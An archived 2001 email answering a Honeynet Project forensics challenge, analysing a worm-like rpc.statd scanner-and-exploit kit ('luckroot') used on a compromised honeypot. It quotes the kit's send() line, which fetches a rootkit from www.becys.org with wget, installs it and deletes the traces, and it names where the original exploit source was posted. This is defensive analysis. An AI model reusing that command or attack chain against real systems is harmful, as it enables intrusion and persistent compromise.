From chuckers@gol.com Sat Mar 17 20:03:25 2001 Date: Fri, 16 Mar 2001 20:37:17 +0900 From: Chuck Douglas To: project@honeynet.org Subject: Scan of the Month 13 [ The following text is in the "iso-2022-jp" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] The questions for Scan 13 are best answered in a slightly different order than presented. First, let's take a look at how the tool works. The tool consists of 3 main pieces: luckgo /* executable shell script */ luckscan-a /* C-Programme */ luckstatdx /* C-Programme */ luckgo performs most of the mindless grunt work for this tool. It requires at least one argument which represents the first byte network number. It will accept up to 3 arguments which will scan up to a class C network. The luckgo script then checks for the existence of the luckscan-a and luckstadx programmes. If it doesn't find them, it will use gcc to compile the provided source code into these required programmes. This is one of the reasons that compilers should not be kept on production machines. Tools hackers can't bring with them can be created with minimal fuss. luckgo then makes a call to the luckscan-a programme. luckscan-a requires at least 2 arguments: The network number to scan and the port to scan. It will optionally take up to 4 arguments with the other 2 representing further network numbers. The luckgo script passes a predefined port of 111 (Sun RPC) as well as the network number(s) it received when called. luckscan-a then proceeds to loop through and attempt to connect to all IP addresses on port 111 starting from the arguments that was passed to it. If it finds a machine that has port 111 open, it will at then make a call to luckstatdx and then continue on scanning all valid IP addresses, looking for port 111. NOTE: luckscan-a is generically written so that it can easily be made to scan and attack ANY port. Again, port 111 comes from a predefined call in in the luckgo script. luckstatdx is the main cracking tool for this kit. It is another generically written programme that can be used for a variety of attacks. It contains shell code for x86 machines that give a root shell on port 39168. It accepts a number of parameters that vary depending on what you want to attack an where you are directing that attack. When called from the luckscan-a programme, it is passed parameters to automatically go after Redhat 6.2 nfs-utils exploit. luckstatdx attempts to run exploit code on a given IP address (already determined to have rpc.statd port open by luckscan-a) and, if successful, opens a connection to a machine called www.becys.org, downloads file called xzibit.tar.gz, expands and extracts the file. It connects to the created directory, runs an install programme, and then deletes the created directory as well as the downloaded file. Presumably this some other rootkit that allows the user to keep access to a cracked machine. That covers how the tool work. Returning to the other questions. The blackhat is attempting to find numerous machines to break into. There are a couple of typing mistakes but the blackhat seems to have a clue about what s/he is doing. Their reactions don't to mistakes don't appear to be panicked and are often times slips of the fingers. After having gained access to honeypot, the blackhat attempts to hide the luckroot tool in /usr/sbin/.mail and download the LUCKROOT.TAR file from their home base. After a few misattempts at getting it open, s/he begins scanning a number of networks: 216.210.0.0 200.120.0.0 64.120.0.0 216.200.0.0 /* initially a typo */ 200.120.0.0 /* ??? this one is already in the list */ 63.1.0.0 216.10.0.0 210.120.0.0 64.1.0.0 216.1.0.0 194.1.0.0 216.1.0.0 210.128.0.0 24.1.0.0 12.20.0.0 These appear to be somewhat random and not directed against any individual. With the large amounts of networks, the blackhat just needs to be patient and lucky. There is probably a good chance that a machine will be cracked. The tool could probably be classified as a worm. Once release, it does its scans and attempts to break in and presumably install rootkits into various machines for later use with little or no intervention from the operator. It supposedly runs all commands in the background so it would be a simple matter of pointing it at a whole lot of networks and waiting. The tool, however, is not original. luckstatdx is based on statdx by ron1n (shellcode@hotmail.com) and can be found at: http://packetstorm.securify.com/0008-exploits/statdx.c The main modification (with the exception of a few output strings here and there) is in the runshell() which contains the line to (presumably) rootkit a newly cracked machine: send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit .tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); The blackhat was kind enough to even comment the fact that s/he had made changes to the code. I am fairly certain I have seen code very similar to luckscan-a which simply searches for rpc.statd exploits. Unfortunately, I can't seem to find the exact code for it at the moment. Modifications presumably include turning a simple scanner into a scanner/cracker. For the bonus question: The creator is possibly Romanian or at least a Romanian speaker. This is based on the comment line: // Aici cred ca trebuie un exit in the runshell() function in luckstatdx.c. The only way I figured out this was Romanian was doing a search on http://www.yahoo.com/ for that sentences which returned a lot of sites in the .RO domain. Checking an online Romanian-English dictionary, this appears to mean something along the lines of "It would probably be better to add an exit from now on." However, I am not a Romanian speaker so can't comment on whether the sentence is grammatical nor even if my translation is approaching correct. For that matter, it could be something that the creater/user saw in some other code or website somewhere and doesn't have any idea what it really means. The creator apparently knows more than enough to be dangerous, though. Yes, it is scripted, but it is tweaked enough to be a cut above download only script kiddies. -- Chuck (茶気) Douglas -- chuckers@gol.com "I don't pretend I have all the answers/Just the obvious ones" --_Backbone_ by Baby Animals Homepage down until further notice.